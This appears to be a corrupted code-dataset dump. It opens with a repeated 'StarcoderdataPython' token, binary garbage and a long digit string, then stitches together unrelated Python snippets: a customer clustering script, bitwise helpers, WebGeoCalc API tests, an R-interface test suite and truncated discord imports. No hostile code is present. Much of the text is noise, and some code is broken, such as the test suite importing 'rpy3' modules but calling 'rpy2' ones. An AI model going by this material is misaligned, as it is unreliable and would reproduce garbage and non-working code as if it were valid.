thonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPython������������� ����� � ��������ؐ%������� �� ��� ����������@���������� ��������������������������� ������ ������������ �������������� ������ ������("�������:%�����]%�������������]%����� ������f%������*�������������@��������������@��������������@��������������������� ���������"���(���/���6���=���E���L���S���[���b���i���p���w���}����������������������������������������������������������������������������� ������ ��'��/��6��=��D��K��Q��Y��`��g��n��u��|���������������������������������������������������������� ������ ��'��.��5��=��E��L��S��Z��a��h��o��w��~���������������������������������������������������������� ������"��)��0��8��?��G��N��U��]��e��k��r��y������������������������������������������������������������������#��*��2��9��?��F��L��S��Z��a��h��p��w��~������������������������������������������������������� ��������&��.��5��<��C��J��Q��X��_��e��l��r��y���������������������������������������������������������� ������ ��%��,��4��;��C��J��Q��X��^��f��n��v��}���������������������������������������������������������� ������#��(��/��7��>��E��L��S��Z��b��i��p��w��~���������������������������������������������������������� ������!��(��0��6��=��C��J��Q��X��_��g��n��v��}�������������������������������������������������������� �� �� �� ��! ��) ��1 ��8 ��? ��F ��M ��T ��[ ��b ��j ��r ��y ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� �� �� �� �� �� ��' ��/ ��6 ��< ��C ��J ��Q ��X ��_ ��f ��m ��u ��| ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� �� �� �� �� ��# ��* ��2 ��: ��A ��G ��N ��U ��\ ��c ��j ��q ��x �� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� �� �� �� �� ��$ ��+ ��3 ��; ��B ��I ��P ��W ��_ ��f ��n ��u ��{ ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� �� �� �� �� ��" ��) ��0 ��7 ��? ��G ��N ��V ��] ��d ��l ��t ��{ ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���� ������!��(��/��5��<��C��J��Q��X��_��f��l��t��{������������������������������������������������������� ������ ��'��.��5��<��C��K��R��Z��a��h��p��w��~���������������������������������������������������������������������5657308797354143237410292399589001526036550927877397543179027106003168004342640544112099027179366451221085025444482577616610361583127285049859612150005202378361252645215958977609586706450474135669091011189611878166761647195531436012105718815761190178867696189813057010216795973368621222953234480117613362180697749315733219519731219267189120664408127890289392982711849795347974226712434802128337682650492709030484156246212411105878483639689541302407879311896774982152743773105688878972979576095122840881076483822981552331112526926286844023694702375014756688441763378117265981017360271995601339175879762693222599458151721742411574242972221332947625734852983585286982173494473612914795790103027419770426558792693772982888623126957906721580536512211901170753742911231699728211382302566518140682785411534115971305213478511137312077295321087031676553165885130107140071129327631637350156997152878712906030757716022611418968128878860658051175587912640774329871900002770095061107233169236671176917919230041228844297452881188979224373598588968818304015981349492734075708862497100438699721749292080328205461584271586777911269922632378536841008255565565898300922110207341033786512494754110275183332329123765037347965855800139086095269187321465109302947927831579144532101751179633823108083657103149197445350918450893105974676881714125708323942938139862410718975178060377343070571734746677778574159420361192953864544593902210403874256753198348553692654370012343426297422959486151063126107936353875483734412311583869114628841168232310852596745433511253170833304881663848276807998442945120135213111873308629813010094071367433979265059182870123421128635961270412510327246624629934849274405010714158924720373977213432497972895641197171634970108024136172276074833403517738896169837918247122345100770322437969124175614768300111981742948919102851378890226869991181386582192931472825554696837161014250336125981869358620853020537521203727374103328334523057555989511191253665204002289069925620555028131543045086430503102744041058946567584268995120115285267219490122974123710110533112047228468573831139689386136771170195799315655897979642627283151801267296225614520140102268573096081105919266906278958464376394723808354103973244112654602315195474501082573701307912096557982232516100556459744133199613412961168825217553435114268523770640014054745522147682816987191041250011437551216696436296068513906108470248008477992262114375112476989119089766240772832213237023507350509537135937258466490671391605946874071453261116210399934436301836172945271192309820629393657757778006813220401212276411416877128210516223044107108372229168127748285368509565481561609717012653378992495700378991225241116913687610301663900970237112165659837128637887097823519905610502059518197481142187032826104744655840233984733011757291011255129520191121535745519016124469178517753785412018492223394310402877823263410073426105434109847471997927591605977058275076625997911338250045295069237976330791081159360538277049246040110786883803896997257011689626921679630259785405382543749778083100987521254900114854993951131014507337666208694856222505267015074212991124010776621627122557451013277846205707526007751207462113401184648791020251105309757260176550995625221299873673900876882627100745404058618110088185860292842357966802367148649479987421628638314556643142895232330120187390958181671406388739076230360181507711068760847216473323945355925510221573111774394085335106192825247104608701210452879119569457340429508536861419772081912114537157511961122167038673007946694011685818264810167843274835340128062281692505834435195253456877809312753111235775442316161859211882944380507851026311338467443217367393065182084549823349312452554141729562226829966144711675353546900310679178120411371006036098230541205908112825193816216453430305658834105304515031346117209837832608926407911661385105334751209623085910521261775579908356800611672697544204422110372205515216676838936115112559847632600128309896249868715811010640105925659463906861276132296844332464436990319333513726248118417545862074127264715236989326435051831847779014504519677782734561252434577273215853046317729211196746484710���������`�����1��1����~��0�M3��3�,4�K�_�{c��h����� ��!�c+��?������ة�T��K��P����� ����#��-��7��;�`g�Bh�xl��v�ׂ�������9������������O��u�+}�u����F����q�����������u�������������� �� �(�����#�!&��,�q<�M>��K��O��^��a��n�x�����l�������T��-�����?�����F��������;��;�����v��?��������A1�|<��<�(N��P��g��i��p��v�5w�,x����������9�����������������^�����h��V�����a��;�����*:��<�A��B�UD��j�zr��s��������A�������� ��������T����� ���� �� �] ��< �gC �8k ��u ��} �� �ކ �� ��� �ģ �6� ��� ��� �� ��� � � �P� �� �r� �i� �l �s �:� ��� ��� �� �l� ��� ��� ��� �� �� ��: �%g ��j �h� �t� �� ��� ��� �� �� ��� ��4 ��7 ��{ �@} �u ��� �v� �� �� ��� �v� ��� �J� �� �� �N� �]� ��� ��� ��� �"� �� �>� �x� �. �� �� �� �H* ��Q ��Y �4v � z �a� ��� �Y� �� ��� �� ��� �����9���%�x5�1B��d��f�nk�nu���w������:��Q�������������<�C���k�$�~3�6�mH��Q��n� w��|�"�Y��;��=��?�al�tm�Sn�"{����!��I��������`�����!��Ǻ����� ����"��#�eO�P��������4��t�����M�����m�����1���,�Z5��8�`?�8B��p�%s��s�����)��2��8�h;��<�Y?�M@�vP��Q��T�~V�դ���i��������������*��L�����."�43��8��E�o��)��X����],��=�w?�=@�L��a�,��\��k����������������a"��'�J-��4�:|����¥����ï�o��H��]��-�����{��"��&��,� .��U�YV��Y�hZ�a��e����������������:��;��>��C��D��T�V�ZY��Y��g��q�uv�}����s���������2����Ұ�I�� �������^�������"��)��R��l�·����'�������������w��}��������h����ơ����e�������9�c�����I��~��]��k�����1�S4�BX��e�w&��'�!y�xz��{���y��6�����n�������q;��A��C��K�L��Y�rr���Lj�3����������J����� ���]�v�D1��6��B�RQ�IZ��`�b��b��f�tk��n�oo�6t�o��Œ�Y������D������ �a< ��? �SA ��P �RU �{� �g� �� ��� �.� ��� ��� ��� �Q� �� ��� ��� �s!��!�j!�w!�!��;!�7@!�bA!�[t!�ow!�c�!�ܿ!���!���!�3�!���!�K�!�� "�z"��"��"�$6"��i"�Py"�|~"���"���"�¨"�Y�"���"���"�4�"���"���"���"�t�"���"��#�� #�_#��#��]#���#��#�v$� $�W$�@$���$�*%�b %�� %�;%��(%�W)%��)%��:%�����import numpy as np import matplotlib.pyplot as plt import pandas as pd # Improting the dataset dataset = pd.read_csv('Mall_Customers.csv') X = dataset.iloc[:, [3,4]].values # Using the dendogram to find the optimal number of clusters # import scipy.cluster.hierarchy as sch # dendrogram = sch.dendrogram(sch.linkage(X, method='ward')) # plt.title('Dendrogram') # plt.xlabel('Customers') # plt.ylabel('Euclidean distances') # plt.show() # Fit hierarchical cluster to the mall dataset from sklearn.cluster import AgglomerativeClustering hc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward') y_hc = hc.fit_predict(X) #Visualizing the clusters plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Careful'); plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Standard'); plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Target'); plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = 'cyan', label = 'Careless'); plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = 'magenta', label = 'Sensible'); plt.title('Clusters of Customers by using Hierarchical Clustering') plt.xlabel('Annual Income (k$)') plt.ylabel('Spending Score (1-100') plt.legend() plt.show() """Collection of small functions to simplify common tasks.""" from typing import Callable def bundle_callables(*callables: Callable) -> Callable: """ Bundle many callables into a single function. Callables will be invoked in the order given. """ def bundle_callables_inner(*args, **kwargs): """Call all callables in order.""" for method in callables: method(*args, **kwargs) return bundle_callables_inner def bitwise_add(a: int, b: int) -> int: """Merge two binary masks together.""" return a | b def bitwise_remove(a: int, b: int) -> int: """Remove a binary mask from another mask.""" if bitwise_contains(a, b): return a ^ b return a def bitwise_contains(a: int, b: int) -> bool: """Return True if any bit of mask `b` is contained in `a`.""" return bool(a & b) <gh_stars>0 # -*- coding: utf-8 -*- '''Test WGC angular frame transformation calculation.''' import pytest from webgeocalc import FrameTransformation from webgeocalc.errors import (CalculationIncompatibleAttr, CalculationInvalidAttr) @pytest.fixture def kernels(): '''Cassini kernel set.''' return 5 @pytest.fixture def time(): '''Input time.''' return '2012-10-19T08:24:00.000' @pytest.fixture def frame_1(): '''Input frame 1.''' return 'IAU_SATURN' @pytest.fixture def frame_2(): '''Input frame 2.''' return 'IAU_ENCELADUS' @pytest.fixture def corr(): '''Input aberration correction.''' return 'NONE' @pytest.fixture def params(kernels, time, frame_1, frame_2, corr): '''Input parameters from WGC API example.''' return { 'kernels': kernels, 'times': time, 'frame_1': frame_1, 'frame_2': frame_2, 'aberration_correction': corr, } @pytest.fixture def payload(kernels, time, frame_1, frame_2, corr): '''Payload from WGC API example.''' return { "kernels": [{ "type": "KERNEL_SET", "id": kernels, }], "timeSystem": "UTC", "timeFormat": "CALENDAR", "times": [ time, ], "calculationType": "FRAME_TRANSFORMATION", "frame1": frame_1, "frame2": frame_2, "aberrationCorrection": corr, "timeLocation": "FRAME1", "orientationRepresentation": "EULER_ANGLES", "axis1": "X", "axis2": "Y", "axis3": "Z", "angularUnits": "deg", "angularVelocityRepresentation": "VECTOR_IN_FRAME1", "angularVelocityUnits": "deg/s" } def test_frame_transformation_payload(params, payload): '''Test angular frame transformation payload.''' assert FrameTransformation(**params).payload == payload def test_frame_transformation_attr_err(params): '''Test errors when frame transformation is invalid.''' del params['aberration_correction'] with pytest.raises(CalculationInvalidAttr): # aberration_correctin can not be '+S' FrameTransformation(aberration_correction='CN+S', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(time_location='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(orientation_representation='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(axis_1='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_units='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_velocity_representation='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_velocity_units='WRONG', **params) with pytest.raises(CalculationIncompatibleAttr): FrameTransformation(angular_velocity_representation='EULER_ANGLE_DERIVATIVES', angular_velocity_units='Unitary', **params) import unittest import rpy3.robjects.tests import rpy3.rinterface.tests import rpy3.rlike.tests import rpy3.tests_rpy_classic def suite(): suite_robjects = rpy2.robjects.tests.suite() suite_rinterface = rpy2.rinterface.tests.suite() suite_rlike = rpy2.rlike.tests.suite() suite_rpy_classic = rpy2.tests_rpy_classic.suite() alltests = unittest.TestSuite([suite_robjects, suite_rinterface, suite_rlike, suite_rpy_classic ]) return alltests if __name__ == "__main__": unittest.main(defaultTest = "suite") from typing import Optional import os import discord from discord import Embed from discord.embeds import EmptyEmbed from discord.ext import commands import re 